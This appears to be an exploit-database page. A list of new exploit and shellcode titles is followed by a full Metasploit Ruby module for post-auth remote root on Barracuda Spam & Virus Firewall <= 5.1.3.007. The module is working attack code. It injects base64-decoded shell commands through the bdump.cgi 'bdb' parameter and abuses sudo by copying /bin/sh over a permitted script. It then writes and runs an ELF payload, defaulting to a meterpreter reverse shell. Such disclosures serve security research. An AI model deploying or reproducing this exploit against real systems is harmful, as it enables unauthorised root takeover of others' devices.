d06dff59f9
16 new exploits Ubuntu Breezy 5.10 - Installer Password Disclosure Ubuntu 5.10 - Installer Password Disclosure BSD/x86 - setuid/portbind (TCP 31337) shellcode (94 bytes) BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes) Linux/x86 - shellcode that forks a HTTP Server on port tcp/8800 (166 bytes) Linux/x86 - listens for shellcode on tcp/5555 and jumps to it (83 bytes) Linux/x86 - Forks a HTTP Server on port 8800/TCP shellcode (166 bytes) Linux/x86 - Listens for shellcode on 5555/TCP and jumps to it (83 bytes) Linux/x86 - Shellcode Polymorphic chmod(_/etc/shadow__666) (54 bytes) Linux/x86 - Polymorphic chmod(_/etc/shadow__666) Shellcode (54 bytes) Linux/x86 - Add root user _r00t_ with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - Add root user 'r00t' with no password to /etc/passwd shellcode (69 bytes) Linux/x86 - SET_PORT() portbind 31337 tcp shellcode (100 bytes) Linux/x86 - SET_PORT() portbind 31337/TCP shellcode (100 bytes) Linux/x86 - Add User _xtz_ without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Add User 'xtz' without Password to /etc/passwd shellcode (59 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/tcp + fork() shellcode (98 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP shellcode (80 bytes) Linux/x86 - Bind /bin/sh to 31337/TCP + fork() shellcode (98 bytes) Linux/x86 - connect-back shellcode 127.0.0.1:31337/tcp (74 bytes) Linux/x86 - Connect-back shellcode 127.0.0.1:31337/TCP (74 bytes) Linux/x86 - Add user _t00r_ encrypt shellcode (116 bytes) Linux/x86 - Add user 't00r' encrypt shellcode (116 bytes) Linux/x86 - Add user _t00r_ shellcode (82 bytes) Linux/x86 - Add user 't00r' shellcode (82 bytes) Linux/x86 - Add user _z_ shellcode (70 bytes) Linux/x86 - Add User 'z' shellcode (70 bytes) Solaris/x86 - portbind/tcp shellcode (Generator) Solaris/x86 - portbind/TCP shellcode (Generator) Linux/x86 - append _/etc/passwd_ & exit() shellcode (107 bytes) Linux/x86 - append '/etc/passwd' & exit() shellcode (107 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals shellcode (60 bytes) Linux/x86 - sends 'Phuck3d!' to all terminals shellcode (60 bytes) Linux/x86 - change mode 0777 of _/etc/shadow_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/shadow' with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of _/etc/passwd_ with sys_chmod syscall shellcode (39 bytes) Linux/x86 - change mode 0777 of '/etc/passwd' with sys_chmod syscall shellcode (39 bytes) Linux/ARM - Add root user _shell-storm_ with password _toor_ shellcode (151 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' shellcode (151 bytes) OS-X/Intel - reverse_tcp shell x86_64 shellcode (131 bytes) OS-X/Intel (x86_64) - reverse_tcp shell shellcode (131 bytes) Linux/SuperH (sh4) - Add root user _shell-storm_ with password _toor_ shellcode (143 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' shellcode (143 bytes) Linux/MIPS - Add user(UID 0) _rOOt_ with password _pwn3d_ shellcode (164 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' shellcode (164 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind 4444/TCP Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Linux/x86 - Bind Shell 33333/TCP Port Shellcode (96 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes) Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP Port 1472 shellcode (IPv6) (199 bytes) Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (656 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes) Linux/x86 - TCP Bind Shell Port 4444 shellcode (98 bytes) Linux/x86 - Bind Shell Port 4444/TCP shellcode (98 bytes) Rapid7 AppSpider 6.12 - Local Privilege Escalation Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit) Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit) MediaCoder 0.8.43.5852 - .m3u SEH Exploit Drupal CODER Module 2.5 - Remote Command Execution (Metasploit) CodoForum 3.2.1 - SQL Injection CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter+ASLR bypass) GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload PHP gettext (gettext.php) 1.0.12 - Unauthenticated Code Execution PHP 7.0.8_ 5.6.23 and 5.5.37 - bzread() Out-of-Bounds Write Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities
169 lines
6.2 KiB
Ruby
Executable file
169 lines
6.2 KiB
Ruby
Executable file
# Exploit Title: Barracuda Spam & Virus Firewall Post Auth Remote Root Exploit
|
|
# Date: 07/21/16
|
|
# Exploit Author: xort xort@blacksecurity.org
|
|
# Vendor Homepage: https://www.barracuda.com/
|
|
# Software Link: https://www.barracuda.com/landing/pages/spamfirewall/
|
|
# Version: Spam and Virus Firewall <= 5.1.3.007
|
|
# Tested on: Spam & Virus Firewall 5.1.3.007
|
|
# CVE : None.
|
|
|
|
require 'msf/core'
|
|
require 'date'
|
|
require "base64"
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
include Exploit::Remote::Tcp
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Barracuda Spam & Virus Firewall (bdump.cgi) Post Auth Root Exploit',
|
|
'Description' => %q{
|
|
This module exploits a remote command execution vulnerability in
|
|
the Barracuda Spam & Virus firewall firmware version <= 5.1.3.007 by exploiting a
|
|
vulnerability in the web administration interface.
|
|
By sending a specially crafted request it's possible to inject system
|
|
commands while escalating to root do to relaxed sudo configuration on the local
|
|
machine.
|
|
},
|
|
'Author' => [ 'xort' ], # disclosure and exploit module
|
|
'References' => [ [ 'none', 'none'] ],
|
|
'Platform' => [ 'linux'],
|
|
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
|
|
'Targets' => [['Spam Firewall firmware: 5x', {}]],
|
|
'DefaultTarget' => 0 ))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('PASSWORD', [ false, 'Password', "admin" ]),
|
|
OptString.new('USERNAME', [ true, 'Admin Username', "admin" ]),
|
|
OptString.new('CMD', [ false, 'Command to execute', "" ]),
|
|
Opt::RPORT(8000),
|
|
], self.class)
|
|
end
|
|
|
|
def do_login(username, password_clear, et)
|
|
vprint_status( "Logging into machine with credentials...\n" )
|
|
|
|
# vars
|
|
timeout = 1550;
|
|
enc_key = Rex::Text.rand_text_hex(32)
|
|
|
|
# send request
|
|
res = send_request_cgi(
|
|
{
|
|
'method' => 'POST',
|
|
'uri' => "/cgi-mod/index.cgi",
|
|
'vars_post' =>
|
|
{
|
|
'password_clear' => password_clear,
|
|
'real_user' => "",
|
|
'login_state' => "out",
|
|
'enc_key' => enc_key,
|
|
'et' => et,
|
|
'locale' => "en_US",
|
|
'user' => username,
|
|
'password' => Digest::MD5.hexdigest(username+enc_key),
|
|
'enctype' => "MD5",
|
|
'password_entry' => "",
|
|
}
|
|
}, timeout)
|
|
|
|
# get rid of first yank
|
|
password = res.body.split('\n').grep(/(.*)id=\"password\" value=\"(.*)\"/){$2}[0] #change to match below for more exact result
|
|
et = res.body.split('\n').grep(/(.*)id=\"et\" value=\"([^\"]+)\"/){$2}[0]
|
|
|
|
return password, et
|
|
end
|
|
|
|
def run_command(username, password, et, cmd)
|
|
|
|
# file to replace
|
|
sudo_cmd_exec = "/home/product/code/firmware/current/bin/mysql_add_cluster_user.sh"
|
|
|
|
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
|
|
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
|
|
|
|
vprint_status( "Running Command...\n" )
|
|
|
|
# random filename to dump too + 'tmp' HAS to be here.
|
|
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
|
|
|
|
# decoder stubs - tells 'base64' command to decode and dump data to temp file
|
|
b64decode1 = "echo \""
|
|
b64decode2 = "\" | base64 -d >" + b64dumpfile
|
|
|
|
# base64 - encode with base64 so we can send special chars and multiple lines
|
|
cmd = Base64.strict_encode64(cmd)
|
|
|
|
# Create injection string.
|
|
# a) package the base64 decoder with encoded bytes
|
|
# b) attach a chmod +x request to make the script created (b64dumpfile) executable
|
|
# c) execute decoded base64 dumpfile
|
|
|
|
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile
|
|
|
|
vprint_status( "sending..." )
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => "/cgi-mod/bdump.cgi",
|
|
'headers' =>
|
|
{
|
|
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
|
|
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
|
|
'Accept-Language' => "en-US,en;q=0.5"
|
|
},
|
|
'vars_get' => {
|
|
'password' => password,
|
|
'et' => et,
|
|
'user' => username,
|
|
'role' => 'admin',
|
|
'_dc' => '',
|
|
'bdb' => '`' + injection_string + '`',
|
|
'locale' => 'en_US'
|
|
}
|
|
})
|
|
end
|
|
|
|
def exploit
|
|
|
|
# params
|
|
timeout = 1550;
|
|
|
|
real_user = "";
|
|
et = Time.now.to_i
|
|
user = datastore['USERNAME']
|
|
password = datastore['PASSWORD']
|
|
|
|
# do login and get password hash
|
|
password_hash, et = do_login(user, password, et)
|
|
vprint_status("got password hash: #{password_hash}\n")
|
|
sleep(2)
|
|
|
|
# clean up hanging prior request
|
|
run_command(user, password_hash, et, ("ps -df|grep bdump|awk '{print $2}' | xargs kill -9"))
|
|
sleep(5)
|
|
|
|
#if no 'CMD' string - add code for root shell
|
|
if not datastore['CMD'].nil? and not datastore['CMD'].empty?
|
|
|
|
cmd = datastore['CMD']
|
|
|
|
# Encode cmd payload
|
|
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
|
|
|
|
# kill stale calls to bdump from previous exploit calls for re-use
|
|
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
|
|
else
|
|
# Encode payload to ELF file for deployment
|
|
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
|
|
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
|
|
|
|
# kill stale calls to bdump from previous exploit calls for re-use
|
|
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
|
|
|
|
handler
|
|
end
|
|
end
|
|
end
|